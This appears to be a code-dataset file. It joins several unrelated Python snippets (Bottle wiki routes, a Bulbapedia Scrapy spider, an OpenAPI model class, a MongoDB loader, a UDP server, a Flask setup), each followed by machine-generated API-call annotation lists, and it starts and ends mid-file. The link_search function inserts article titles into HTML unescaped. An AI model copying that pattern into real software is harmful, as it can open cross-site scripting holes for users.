@article_env
def modal_edit_metadata(wiki: Wiki, user: Author, article: Article):
return template(
"includes/modal.tpl",
title="Edit article metadata",
body=template(
"includes/modal_metadata.tpl",
url=f"{article.link}/edit-metadata",
article=article,
),
footer="",
)
@route(f"{Wiki.PATH}{Article.PATH}/edit-metadata", method="POST")
@article_env
def modal_edit_metadata_post(wiki: Wiki, user: Author, article: Article):
key = request.forms.key
if key:
value = request.forms.value
article.set_metadata(key, value)
delete = request.forms.delete
if delete:
try:
delete_instance = article.metadata.where(Metadata.id == delete).get()
delete_instance.delete_instance()
except Metadata.DoesNotExist:
pass
return template(
"includes/modal_metadata.tpl",
url=f"{article.link}/edit-metadata",
article=article,
)
def link_search(wiki, search):
search_results = wiki.articles.select().where(
Article.draft_of.is_null(), Article.revision_of.is_null()
)
if search:
search_results = search_results.where(Article.title.contains(search))
search_results = search_results.order_by(SQL("title COLLATE NOCASE")).limit(10)
results = ['<ul class="list-unstyled">']
for result in search_results:
link = f'<li><a onclick="insertLinkFromList(this);" href="#">{result.title}</a></li>'
results.append(link)
return "".join(results)
@route(f"{Wiki.PATH}{Article.PATH}/insert-link")
@article_env
def modal_insert_link_search(wiki: Wiki, user: Author, article: Article):
return template(
"includes/modal.tpl",
title="Insert link into article",
body=template(
"includes/modal_search.tpl",
url=f"{article.link}/insert-link",
search_results=link_search(wiki, None),
alt_input=("Text for link", "link_text"),
),
footer="",
)
@route(f"{Wiki.PATH}{Article.PATH}/insert-link", method="POST")
@article_env
def modal_insert_link_search_post(wiki: Wiki, user: Author, article: Article):
search = request.forms.search_query
return link_search(wiki, search)
| [
"models.Article.title.contains",
"bottle.template",
"models.Article.revision_of.is_null",
"peewee.SQL",
"models.Article",
"models.ArticleLinks.update",
"bottle.route",
"models.Wiki.title_to_url",
"datetime.datetime.now",
"models.Tag.title.contains",
"utils.Unsafe",
"models.Article.get",
"uti... | [((348, 377), 'bottle.route', 'route', (['f"""{Wiki.PATH}/article"""'], {}), "(f'{Wiki.PATH}/article')\n", (353, 377), False, 'from bottle import template, route, redirect, request\n'), ((464, 499), 'bottle.route', 'route', (['f"""{Wiki.PATH}{Article.PATH}"""'], {}), "(f'{Wiki.PATH}{Article.PATH}')\n", (469, 499), False, 'from bottle import template, route, redirect, request\n'), ((916, 958), 'bottle.route', 'route', (['f"""{Wiki.PATH}/new_from_form/<form>"""'], {}), "(f'{Wiki.PATH}/new_from_form/<form>')\n", (921, 958), False, 'from bottle import template, route, redirect, request\n'), ((1104, 1154), 'bottle.route', 'route', (['f"""{Wiki.PATH}/new_from_form/<form>/<title>"""'], {}), "(f'{Wiki.PATH}/new_from_form/<form>/<title>')\n", (1109, 1154), False, 'from bottle import template, route, redirect, request\n'), ((1318, 1376), 'bottle.route', 'route', (['f"""{Wiki.PATH}{Article.PATH}/revision/<revision_id>"""'], {}), "(f'{Wiki.PATH}{Article.PATH}/revision/<revision_id>')\n", (1323, 1376), False, 'from bottle import template, route, redirect, request\n'), ((1781, 1824), 'bottle.route', 'route', (['f"""{Wiki.PATH}{Article.PATH}/history"""'], {}), "(f'{Wiki.PATH}{Article.PATH}/history')\n", (1786, 1824), False, 'from bottle import template, route, redirect, request\n'), ((2071, 2138), 'bottle.route', 'route', (['f"""{Wiki.PATH}{Article.PATH}/preview"""'], {'method': "('GET', 'POST')"}), "(f'{Wiki.PATH}{Article.PATH}/preview', method=('GET', 'POST'))\n", (2076, 2138), False, 'from bottle import template, route, redirect, request\n'), ((2738, 2793), 'bottle.route', 'route', (['f"""{Wiki.PATH}{Article.PATH}/save"""'], {'method': '"""POST"""'}), "(f'{Wiki.PATH}{Article.PATH}/save', method='POST')\n", (2743, 2793), False, 'from bottle import template, route, redirect, request\n'), ((2919, 2983), 'bottle.route', 'route', (['f"""{Wiki.PATH}{Article.PATH}/edit"""'], {'method': "('GET', 'POST')"}), "(f'{Wiki.PATH}{Article.PATH}/edit', method=('GET', 'POST'))\n", (2924, 2983), False, 'from bottle import template, route, redirect, request\n'), ((8323, 8365), 'bottle.route', 'route', (['f"""{Wiki.PATH}{Article.PATH}/delete"""'], {}), "(f'{Wiki.PATH}{Article.PATH}/delete')\n", (8328, 8365), False, 'from bottle import template, route, redirect, request\n'), ((9017, 9072), 'bottle.route', 'route', (['f"""{Wiki.PATH}{Article.PATH}/delete/<delete_key>"""'], {}), "(f'{Wiki.PATH}{Article.PATH}/delete/<delete_key>')\n", (9022, 9072), False, 'from bottle import template, route, redirect, request\n'), ((10110, 10159), 'bottle.route', 'route', (['f"""{Wiki.PATH}{Article.PATH}/discard-draft"""'], {}), "(f'{Wiki.PATH}{Article.PATH}/discard-draft')\n", (10115, 10159), False, 'from bottle import template, route, redirect, request\n'), ((10900, 10962), 'bottle.route', 'route', (['f"""{Wiki.PATH}{Article.PATH}/discard-draft/<delete_key>"""'], {}), "(f'{Wiki.PATH}{Article.PATH}/discard-draft/<delete_key>')\n", (10905, 10962), False, 'from bottle import template, route, redirect, request\n'), ((11197, 11245), 'bottle.route', 'route', (['f"""{Wiki.PATH}{Article.PATH}/insert-image"""'], {}), "(f'{Wiki.PATH}{Article.PATH}/insert-image')\n", (11202, 11245), False, 'from bottle import template, route, redirect, request\n'), ((11626, 11689), 'bottle.route', 'route', (['f"""{Wiki.PATH}{Article.PATH}/insert-image"""'], {'method': '"""POST"""'}), "(f'{Wiki.PATH}{Article.PATH}/insert-image', method='POST')\n", (11631, 11689), False, 'from bottle import template, route, redirect, request\n'), ((12788, 12834), 'bottle.route', 'route', (['f"""{Wiki.PATH}{Article.PATH}/insert-tag"""'], {}), "(f'{Wiki.PATH}{Article.PATH}/insert-tag')\n", (12793, 12834), False, 'from bottle import template, route, redirect, request\n'), ((13324, 13385), 'bottle.route', 'route', (['f"""{Wiki.PATH}{Article.PATH}/insert-tag"""'], {'method': '"""POST"""'}), "(f'{Wiki.PATH}{Article.PATH}/insert-tag', method='POST')\n", (13329, 13385), False, 'from bottle import template, route, redirect, request\n'), ((13549, 13607), 'bottle.route', 'route', (['f"""{Wiki.PATH}{Article.PATH}/add-tag"""'], {'method': '"""POST"""'}), "(f'{Wiki.PATH}{Article.PATH}/add-tag', method='POST')\n", (13554, 13607), False, 'from bottle import template, route, redirect, request\n'), ((13802, 13863), 'bottle.route', 'route', (['f"""{Wiki.PATH}{Article.PATH}/remove-tag"""'], {'method': '"""POST"""'}), "(f'{Wiki.PATH}{Article.PATH}/remove-tag', method='POST')\n", (13807, 13863), False, 'from bottle import template, route, redirect, request\n'), ((14064, 14113), 'bottle.route', 'route', (['f"""{Wiki.PATH}{Article.PATH}/edit-metadata"""'], {}), "(f'{Wiki.PATH}{Article.PATH}/edit-metadata')\n", (14069, 14113), False, 'from bottle import template, route, redirect, request\n'), ((14469, 14533), 'bottle.route', 'route', (['f"""{Wiki.PATH}{Article.PATH}/edit-metadata"""'], {'method': '"""POST"""'}), "(f'{Wiki.PATH}{Article.PATH}/edit-metadata', method='POST')\n", (14474, 14533), False, 'from bottle import template, route, redirect, request\n'), ((15692, 15739), 'bottle.route', 'route', (['f"""{Wiki.PATH}{Article.PATH}/insert-link"""'], {}), "(f'{Wiki.PATH}{Article.PATH}/insert-link')\n", (15697, 15739), False, 'from bottle import template, route, redirect, request\n'), ((16177, 16239), 'bottle.route', 'route', (['f"""{Wiki.PATH}{Article.PATH}/insert-link"""'], {'method': '"""POST"""'}), "(f'{Wiki.PATH}{Article.PATH}/insert-link', method='POST')\n", (16182, 16239), False, 'from bottle import template, route, redirect, request\n'), ((881, 912), 'bottle.redirect', 'redirect', (['new_article.edit_link'], {}), '(new_article.edit_link)\n', (889, 912), False, 'from bottle import template, route, redirect, request\n'), ((1636, 1743), 'bottle.template', 'template', (['"""article.tpl"""'], {'articles': '[revision]', 'page_title': 'f"""{revision.title} ({wiki.title})"""', 'wiki': 'wiki'}), "('article.tpl', articles=[revision], page_title=\n f'{revision.title} ({wiki.title})', wiki=wiki)\n", (1644, 1743), False, 'from bottle import template, route, redirect, request\n'), ((1914, 2033), 'bottle.template', 'template', (['"""article_history.tpl"""'], {'article': 'article', 'page_title': 'f"""History: {article.title} ({wiki.title})"""', 'wiki': 'wiki'}), "('article_history.tpl', article=article, page_title=\n f'History: {article.title} ({wiki.title})', wiki=wiki)\n", (1922, 2033), False, 'from bottle import template, route, redirect, request\n'), ((13115, 13291), 'bottle.template', 'template', (['"""includes/modal.tpl"""'], {'title': '"""Edit article tags"""', 'body': 'f"""Existing tags (click to remove):<br/><div id="modal-tag-listing">{tags}</div><hr/>{body}"""', 'footer': '""""""'}), '(\'includes/modal.tpl\', title=\'Edit article tags\', body=\n f\'Existing tags (click to remove):<br/><div id="modal-tag-listing">{tags}</div><hr/>{body}\'\n , footer=\'\')\n', (13123, 13291), False, 'from bottle import template, route, redirect, request\n'), ((14997, 15094), 'bottle.template', 'template', (['"""includes/modal_metadata.tpl"""'], {'url': 'f"""{article.link}/edit-metadata"""', 'article': 'article'}), "('includes/modal_metadata.tpl', url=f'{article.link}/edit-metadata',\n article=article)\n", (15005, 15094), False, 'from bottle import template, route, redirect, request\n'), ((2269, 2355), 'models.Article', 'Article', ([], {'title': 'request.forms.article_title', 'content': 'request.forms.article_content'}), '(title=request.forms.article_title, content=request.forms.\n article_content)\n', (2276, 2355), False, 'from models import Article, ArticleLinks, Wiki, Author, Tag, Metadata\n'), ((9242, 9261), 'bottle.redirect', 'redirect', (['wiki.link'], {}), '(wiki.link)\n', (9250, 9261), False, 'from bottle import template, route, redirect, request\n'), ((9319, 9341), 'bottle.redirect', 'redirect', (['article.link'], {}), '(article.link)\n', (9327, 9341), False, 'from bottle import template, route, redirect, request\n'), ((10279, 10301), 'bottle.redirect', 'redirect', (['article.link'], {}), '(article.link)\n', (10287, 10301), False, 'from bottle import template, route, redirect, request\n'), ((10351, 10373), 'bottle.redirect', 'redirect', (['article.link'], {}), '(article.link)\n', (10359, 10373), False, 'from bottle import template, route, redirect, request\n'), ((15214, 15240), 'models.Article.draft_of.is_null', 'Article.draft_of.is_null', ([], {}), '()\n', (15238, 15240), False, 'from models import Article, ArticleLinks, Wiki, Author, Tag, Metadata\n'), ((15242, 15271), 'models.Article.revision_of.is_null', 'Article.revision_of.is_null', ([], {}), '()\n', (15269, 15271), False, 'from models import Article, ArticleLinks, Wiki, Author, Tag, Metadata\n'), ((3407, 3443), 'bottle.redirect', 'redirect', (['article.draft_of.edit_link'], {}), '(article.draft_of.edit_link)\n', (3415, 3443), False, 'from bottle import template, route, redirect, request\n'), ((3736, 3891), 'models.Article', 'Article', ([], {'wiki': 'article.wiki', 'title': 'f"""Draft: {article.title}"""', 'content': 'article.content', 'author': 'article.author', 'created': 'article.created', 'draft_of': 'article'}), "(wiki=article.wiki, title=f'Draft: {article.title}', content=article\n .content, author=article.author, created=article.created, draft_of=article)\n", (3743, 3891), False, 'from models import Article, ArticleLinks, Wiki, Author, Tag, Metadata\n'), ((4544, 4567), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (4565, 4567), False, 'import datetime\n'), ((4631, 4823), 'utils.Message', 'Message', (['"""This article was previously opened for editing without being saved. It may contain unsaved changes elsewhere. Use \'Save and Exit\' or \'Quit Editing\' to remove this message."""'], {}), '(\n "This article was previously opened for editing without being saved. It may contain unsaved changes elsewhere. Use \'Save and Exit\' or \'Quit Editing\' to remove this message."\n )\n', (4638, 4823), False, 'from utils import Message, Error, Unsafe\n'), ((5196, 5218), 'bottle.redirect', 'redirect', (['article.link'], {}), '(article.link)\n', (5204, 5218), False, 'from bottle import template, route, redirect, request\n'), ((5583, 5606), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (5604, 5606), False, 'import datetime\n'), ((7761, 7798), 'models.Article.get', 'Article.get', (['(Article.id == article.id)'], {}), '(Article.id == article.id)\n', (7772, 7798), False, 'from models import Article, ArticleLinks, Wiki, Author, Tag, Metadata\n'), ((7880, 7935), 'utils.Message', 'Message', (['"""Article successfully saved."""'], {'color': '"""success"""'}), "('Article successfully saved.', color='success')\n", (7887, 7935), False, 'from utils import Message, Error, Unsafe\n'), ((8470, 8491), 'utils.Unsafe', 'Unsafe', (['article.title'], {}), '(article.title)\n', (8476, 8491), False, 'from utils import Message, Error, Unsafe\n'), ((10393, 10414), 'utils.Unsafe', 'Unsafe', (['article.title'], {}), '(article.title)\n', (10399, 10414), False, 'from utils import Message, Error, Unsafe\n'), ((14299, 14396), 'bottle.template', 'template', (['"""includes/modal_metadata.tpl"""'], {'url': 'f"""{article.link}/edit-metadata"""', 'article': 'article'}), "('includes/modal_metadata.tpl', url=f'{article.link}/edit-metadata',\n article=article)\n", (14307, 14396), False, 'from bottle import template, route, redirect, request\n'), ((15340, 15370), 'models.Article.title.contains', 'Article.title.contains', (['search'], {}), '(search)\n', (15362, 15370), False, 'from models import Article, ArticleLinks, Wiki, Author, Tag, Metadata\n'), ((5309, 5345), 'bottle.redirect', 'redirect', (['article.discard_draft_link'], {}), '(article.discard_draft_link)\n', (5317, 5345), False, 'from bottle import template, route, redirect, request\n'), ((6528, 6550), 'bottle.redirect', 'redirect', (['article.link'], {}), '(article.link)\n', (6536, 6550), False, 'from bottle import template, route, redirect, request\n'), ((8938, 9004), 'utils.Message', 'Message', (['warning'], {'yes': 'article.delete_confirm_link', 'no': 'article.link'}), '(warning, yes=article.delete_confirm_link, no=article.link)\n', (8945, 9004), False, 'from utils import Message, Error, Unsafe\n'), ((10805, 10878), 'utils.Message', 'Message', (['warning'], {'yes': 'article.discard_draft_confirm_link', 'no': 'article.link'}), '(warning, yes=article.discard_draft_confirm_link, no=article.link)\n', (10812, 10878), False, 'from utils import Message, Error, Unsafe\n'), ((15418, 15445), 'peewee.SQL', 'SQL', (['"""title COLLATE NOCASE"""'], {}), "('title COLLATE NOCASE')\n", (15421, 15445), False, 'from peewee import SQL\n'), ((3224, 3256), 'models.Wiki.title_to_url', 'Wiki.title_to_url', (['article.title'], {}), '(article.title)\n', (3241, 3256), False, 'from models import Article, ArticleLinks, Wiki, Author, Tag, Metadata\n'), ((7432, 7458), 'bottle.redirect', 'redirect', (['new_article.link'], {}), '(new_article.link)\n', (7440, 7458), False, 'from bottle import template, route, redirect, request\n'), ((9411, 9467), 'models.ArticleLinks.update', 'ArticleLinks.update', ([], {'link': 'article.title', 'valid_link': 'None'}), '(link=article.title, valid_link=None)\n', (9430, 9467), False, 'from models import Article, ArticleLinks, Wiki, Author, Tag, Metadata\n'), ((12311, 12338), 'peewee.SQL', 'SQL', (['"""title COLLATE NOCASE"""'], {}), "('title COLLATE NOCASE')\n", (12314, 12338), False, 'from peewee import SQL\n'), ((12498, 12525), 'peewee.SQL', 'SQL', (['"""title COLLATE NOCASE"""'], {}), "('title COLLATE NOCASE')\n", (12501, 12525), False, 'from peewee import SQL\n'), ((7693, 7715), 'bottle.redirect', 'redirect', (['article.link'], {}), '(article.link)\n', (7701, 7715), False, 'from bottle import template, route, redirect, request\n'), ((6096, 6117), 'utils.Unsafe', 'Unsafe', (['article_title'], {}), '(article_title)\n', (6102, 6117), False, 'from utils import Message, Error, Unsafe\n'), ((7632, 7668), 'bottle.redirect', 'redirect', (['article.draft_of.edit_link'], {}), '(article.draft_of.edit_link)\n', (7640, 7668), False, 'from bottle import template, route, redirect, request\n'), ((10055, 10076), 'utils.Unsafe', 'Unsafe', (['article.title'], {}), '(article.title)\n', (10061, 10076), False, 'from utils import Message, Error, Unsafe\n'), ((12448, 12474), 'models.Tag.title.contains', 'Tag.title.contains', (['search'], {}), '(search)\n', (12466, 12474), False, 'from models import Article, ArticleLinks, Wiki, Author, Tag, Metadata\n')] |
import scrapy
from scrapy.crawler import CrawlerProcess
def pkm_spider():
class PkmSpider(scrapy.Spider):
name = 'pkms'
def start_requests(self):
yield scrapy.Request('https://bulbapedia.bulbagarden.net/wiki/Bulbasaur_(Pok%C3%A9mon)')
def parse(self, response):
items = {}
# name = response.css('span.CurrentConditions--tempValue--1RYJJ::text').extract()
name = str(response.css('h1.firstHeading::text').get(default='Not Applicable').strip())[:-10]
next_pkm = str(response.xpath('//*[@id="mw-content-text"]/div/table[1]/tbody/tr[2]/td[3]/table/tbody/tr/td[1]/a/span/text()').get(default='Not Applicable').strip())[6:]
if next_pkm == 'plicable':
next_pkm = str(response.xpath('//*[@id="mw-content-text"]/div/table[1]/tbody/tr[1]/td[3]/table/tbody/tr/td[1]/a/span/text()').get(default='Not Applicable').strip())[6:]
else:
pass
type1 = response.xpath('//*[@id="mw-content-text"]/div/table[2]/tbody/tr[2]/td/table/tbody/tr/td[1]/table/tbody/tr/td[1]/a/span/b/text()').get(default='Not Applicable').strip()
type2 = response.xpath('//*[@id="mw-content-text"]/div/table[2]/tbody/tr[2]/td/table/tbody/tr/td[1]/table/tbody/tr/td[2]/a/span/b/text()').get(default='Not Applicable').strip()
items['name'] = name
items['type1'] = type1
items['type2'] = type2
yield items
yield scrapy.Request(f'https://bulbapedia.bulbagarden.net/wiki/{next_pkm}_(Pok%C3%A9mon)', callback=self.parse)
process = CrawlerProcess(settings={
'FEED_URI': 'pkmns_name_type.csv',
'FEED_FORMAT': 'csv'
})
process.crawl(PkmSpider)
process.start()
if __name__ == "__main__":
pkm_spider()
| [
"scrapy.crawler.CrawlerProcess",
"scrapy.Request"
] | [((1619, 1705), 'scrapy.crawler.CrawlerProcess', 'CrawlerProcess', ([], {'settings': "{'FEED_URI': 'pkmns_name_type.csv', 'FEED_FORMAT': 'csv'}"}), "(settings={'FEED_URI': 'pkmns_name_type.csv', 'FEED_FORMAT':\n 'csv'})\n", (1633, 1705), False, 'from scrapy.crawler import CrawlerProcess\n'), ((186, 273), 'scrapy.Request', 'scrapy.Request', (['"""https://bulbapedia.bulbagarden.net/wiki/Bulbasaur_(Pok%C3%A9mon)"""'], {}), "(\n 'https://bulbapedia.bulbagarden.net/wiki/Bulbasaur_(Pok%C3%A9mon)')\n", (200, 273), False, 'import scrapy\n'), ((1497, 1611), 'scrapy.Request', 'scrapy.Request', (['f"""https://bulbapedia.bulbagarden.net/wiki/{next_pkm}_(Pok%C3%A9mon)"""'], {'callback': 'self.parse'}), "(\n f'https://bulbapedia.bulbagarden.net/wiki/{next_pkm}_(Pok%C3%A9mon)',\n callback=self.parse)\n", (1511, 1611), False, 'import scrapy\n')] |
# coding: utf-8
"""
OOXML Automation
This API helps users convert Excel and Powerpoint documents into rich, live dashboards and stories. # noqa: E501
The version of the OpenAPI document: 0.1.0-no-tags
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
class ChartPlotType(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
openapi_types = {
'type_id': 'int',
'plot_type_name': 'str',
'plot_qualifed_assy': 'str',
'row_col_type_id': 'int',
'id': 'str'
}
attribute_map = {
'type_id': 'typeId',
'plot_type_name': 'plotTypeName',
'plot_qualifed_assy': 'plotQualifedAssy',
'row_col_type_id': 'rowColTypeId',
'id': 'id'
}
def __init__(self, type_id=None, plot_type_name=None, plot_qualifed_assy=None, row_col_type_id=None, id=None): # noqa: E501
"""ChartPlotType - a model defined in OpenAPI""" # noqa: E501
self._type_id = None
self._plot_type_name = None
self._plot_qualifed_assy = None
self._row_col_type_id = None
self._id = None
self.discriminator = None
if type_id is not None:
self.type_id = type_id
self.plot_type_name = plot_type_name
self.plot_qualifed_assy = plot_qualifed_assy
if row_col_type_id is not None:
self.row_col_type_id = row_col_type_id
if id is not None:
self.id = id
@property
def type_id(self):
"""Gets the type_id of this ChartPlotType. # noqa: E501
:return: The type_id of this ChartPlotType. # noqa: E501
:rtype: int
"""
return self._type_id
@type_id.setter
def type_id(self, type_id):
"""Sets the type_id of this ChartPlotType.
:param type_id: The type_id of this ChartPlotType. # noqa: E501
:type: int
"""
self._type_id = type_id
@property
def plot_type_name(self):
"""Gets the plot_type_name of this ChartPlotType. # noqa: E501
:return: The plot_type_name of this ChartPlotType. # noqa: E501
:rtype: str
"""
return self._plot_type_name
@plot_type_name.setter
def plot_type_name(self, plot_type_name):
"""Sets the plot_type_name of this ChartPlotType.
:param plot_type_name: The plot_type_name of this ChartPlotType. # noqa: E501
:type: str
"""
self._plot_type_name = plot_type_name
@property
def plot_qualifed_assy(self):
"""Gets the plot_qualifed_assy of this ChartPlotType. # noqa: E501
:return: The plot_qualifed_assy of this ChartPlotType. # noqa: E501
:rtype: str
"""
return self._plot_qualifed_assy
@plot_qualifed_assy.setter
def plot_qualifed_assy(self, plot_qualifed_assy):
"""Sets the plot_qualifed_assy of this ChartPlotType.
:param plot_qualifed_assy: The plot_qualifed_assy of this ChartPlotType. # noqa: E501
:type: str
"""
self._plot_qualifed_assy = plot_qualifed_assy
@property
def row_col_type_id(self):
"""Gets the row_col_type_id of this ChartPlotType. # noqa: E501
:return: The row_col_type_id of this ChartPlotType. # noqa: E501
:rtype: int
"""
return self._row_col_type_id
@row_col_type_id.setter
def row_col_type_id(self, row_col_type_id):
"""Sets the row_col_type_id of this ChartPlotType.
:param row_col_type_id: The row_col_type_id of this ChartPlotType. # noqa: E501
:type: int
"""
self._row_col_type_id = row_col_type_id
@property
def id(self):
"""Gets the id of this ChartPlotType. # noqa: E501
:return: The id of this ChartPlotType. # noqa: E501
:rtype: str
"""
return self._id
@id.setter
def id(self, id):
"""Sets the id of this ChartPlotType.
:param id: The id of this ChartPlotType. # noqa: E501
:type: str
"""
self._id = id
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, ChartPlotType):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| [
"six.iteritems"
] | [((4622, 4655), 'six.iteritems', 'six.iteritems', (['self.openapi_types'], {}), '(self.openapi_types)\n', (4635, 4655), False, 'import six\n')] |
import datetime
import gridfs # type: ignore
import pymongo # type: ignore
import tenacity
from typing import Optional
from dsw2to3.config import MongoConfig
from dsw2to3.errors import ERROR_HANDLER
from dsw2to3.logger import LOGGER
DOCUMENT_FS_COLLECTION = 'documentFs'
ASSETS_FS_COLLECTION = 'templateAssetFs'
def _fetch_file(fs: gridfs.GridFS, file_name: str) -> Optional[bytes]:
data = None
try:
file = fs.find_one({'filename': file_name})
if file is not None:
data = file.read()
file.close()
except Exception as e:
LOGGER.debug(f'Failed to retrieve file from GridFS '
f'with filename {file_name}: {e}')
return data
class MongoDB:
def __init__(self, config: MongoConfig):
self.config = config
self.client = pymongo.MongoClient(**self.config.mongo_client_kwargs)
self.db = self.client[self.config.database]
self.doc_fs = gridfs.GridFS(self.db, DOCUMENT_FS_COLLECTION)
self.asset_fs = gridfs.GridFS(self.db, ASSETS_FS_COLLECTION)
self.now = datetime.datetime.now()
def update_now(self):
self.now = datetime.datetime.now()
@tenacity.retry(
reraise=True,
wait=tenacity.wait_exponential(multiplier=0.5),
stop=tenacity.stop_after_attempt(3),
)
def load_list(self, entity) -> list:
result = list()
for doc in self.db[entity.COLLECTION].find():
try:
result.append(entity.from_mongo(doc, self.now))
except Exception as e:
ERROR_HANDLER.error(
cause='MongoDB',
message=f'- cannot load {entity.__name__} '
f'({e}): {doc}'
)
LOGGER.info(f'- loaded {entity.__name__}: {len(result)} entries')
return result
@tenacity.retry(
reraise=True,
wait=tenacity.wait_exponential(multiplier=0.5),
stop=tenacity.stop_after_attempt(3),
)
def load_nested(self, source_entity, target_entity, field: str):
result = list()
for doc in self.db[source_entity.COLLECTION].find():
children = doc.get(field, [])
try:
for child in children:
result.append(target_entity.from_mongo(doc, child, self.now))
except Exception as e:
ERROR_HANDLER.error(
cause='MongoDB',
message=f'- cannot load {target_entity.__name__} '
f'({e}): {doc}'
)
LOGGER.info(f'- loaded {target_entity.__name__}: {len(result)} entries')
return result
@tenacity.retry(
reraise=True,
wait=tenacity.wait_exponential(multiplier=0.5),
stop=tenacity.stop_after_attempt(3),
)
def fetch_document(self, file_name: str) -> Optional[bytes]:
return _fetch_file(self.doc_fs, file_name)
@tenacity.retry(
reraise=True,
wait=tenacity.wait_exponential(multiplier=0.5),
stop=tenacity.stop_after_attempt(3),
)
def fetch_asset(self, file_name: str) -> Optional[bytes]:
return _fetch_file(self.asset_fs, file_name)
| [
"gridfs.GridFS",
"dsw2to3.logger.LOGGER.debug",
"datetime.datetime.now",
"dsw2to3.errors.ERROR_HANDLER.error",
"pymongo.MongoClient",
"tenacity.wait_exponential",
"tenacity.stop_after_attempt"
] | [((826, 880), 'pymongo.MongoClient', 'pymongo.MongoClient', ([], {}), '(**self.config.mongo_client_kwargs)\n', (845, 880), False, 'import pymongo\n'), ((955, 1001), 'gridfs.GridFS', 'gridfs.GridFS', (['self.db', 'DOCUMENT_FS_COLLECTION'], {}), '(self.db, DOCUMENT_FS_COLLECTION)\n', (968, 1001), False, 'import gridfs\n'), ((1026, 1070), 'gridfs.GridFS', 'gridfs.GridFS', (['self.db', 'ASSETS_FS_COLLECTION'], {}), '(self.db, ASSETS_FS_COLLECTION)\n', (1039, 1070), False, 'import gridfs\n'), ((1090, 1113), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (1111, 1113), False, 'import datetime\n'), ((1160, 1183), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (1181, 1183), False, 'import datetime\n'), ((587, 675), 'dsw2to3.logger.LOGGER.debug', 'LOGGER.debug', (['f"""Failed to retrieve file from GridFS with filename {file_name}: {e}"""'], {}), "(\n f'Failed to retrieve file from GridFS with filename {file_name}: {e}')\n", (599, 675), False, 'from dsw2to3.logger import LOGGER\n'), ((1241, 1282), 'tenacity.wait_exponential', 'tenacity.wait_exponential', ([], {'multiplier': '(0.5)'}), '(multiplier=0.5)\n', (1266, 1282), False, 'import tenacity\n'), ((1297, 1327), 'tenacity.stop_after_attempt', 'tenacity.stop_after_attempt', (['(3)'], {}), '(3)\n', (1324, 1327), False, 'import tenacity\n'), ((1923, 1964), 'tenacity.wait_exponential', 'tenacity.wait_exponential', ([], {'multiplier': '(0.5)'}), '(multiplier=0.5)\n', (1948, 1964), False, 'import tenacity\n'), ((1979, 2009), 'tenacity.stop_after_attempt', 'tenacity.stop_after_attempt', (['(3)'], {}), '(3)\n', (2006, 2009), False, 'import tenacity\n'), ((2753, 2794), 'tenacity.wait_exponential', 'tenacity.wait_exponential', ([], {'multiplier': '(0.5)'}), '(multiplier=0.5)\n', (2778, 2794), False, 'import tenacity\n'), ((2809, 2839), 'tenacity.stop_after_attempt', 'tenacity.stop_after_attempt', (['(3)'], {}), '(3)\n', (2836, 2839), False, 'import tenacity\n'), ((3020, 3061), 'tenacity.wait_exponential', 'tenacity.wait_exponential', ([], {'multiplier': '(0.5)'}), '(multiplier=0.5)\n', (3045, 3061), False, 'import tenacity\n'), ((3076, 3106), 'tenacity.stop_after_attempt', 'tenacity.stop_after_attempt', (['(3)'], {}), '(3)\n', (3103, 3106), False, 'import tenacity\n'), ((1586, 1684), 'dsw2to3.errors.ERROR_HANDLER.error', 'ERROR_HANDLER.error', ([], {'cause': '"""MongoDB"""', 'message': 'f"""- cannot load {entity.__name__} ({e}): {doc}"""'}), "(cause='MongoDB', message=\n f'- cannot load {entity.__name__} ({e}): {doc}')\n", (1605, 1684), False, 'from dsw2to3.errors import ERROR_HANDLER\n'), ((2402, 2507), 'dsw2to3.errors.ERROR_HANDLER.error', 'ERROR_HANDLER.error', ([], {'cause': '"""MongoDB"""', 'message': 'f"""- cannot load {target_entity.__name__} ({e}): {doc}"""'}), "(cause='MongoDB', message=\n f'- cannot load {target_entity.__name__} ({e}): {doc}')\n", (2421, 2507), False, 'from dsw2to3.errors import ERROR_HANDLER\n')] |
from server import ThreadedUDPServer
import threading
# Create the server instance and assign the binding address for it
server = ThreadedUDPServer(('localhost', 9999))
# Set up a few example event handlers
@server.on('connected')
def connected(msg, socket):
""" Both 'connected' and 'disconnected' are events
reserved by the server. It will call them automatically.
"""
print("New client: {}".format(socket))
@server.on('message')
def got_message(msg, socket):
""" This is a custom event called "message".
When a client sends a message event, this handler
will repeat that message back to all connected clients.
"""
print("[{}]: {}".format(socket, msg))
server.send_all('message', msg)
if __name__ == "__main__":
server_thread = threading.Thread(target=server.serve_forever)
server_thread.daemon = True
server_thread.start()
while True:
pass
server.shutdown()
| [
"threading.Thread",
"server.ThreadedUDPServer"
] | [((132, 170), 'server.ThreadedUDPServer', 'ThreadedUDPServer', (["('localhost', 9999)"], {}), "(('localhost', 9999))\n", (149, 170), False, 'from server import ThreadedUDPServer\n'), ((799, 844), 'threading.Thread', 'threading.Thread', ([], {'target': 'server.serve_forever'}), '(target=server.serve_forever)\n', (815, 844), False, 'import threading\n')] |
from flask import Flask
from flask_bootstrap import Bootstrap
from flask_socketio import SocketIO
from config import Config
import eventlet
eventlet.monkey_patch()
# where should I move this normally ?
async_mode = None
app = Flask(__name__)
bootstrap = Bootstrap(app)
socketio = SocketIO(app, async_mode='eventlet')
app.config.from_object(Config)
from app import routes
| [
"flask_bootstrap.Bootstrap",
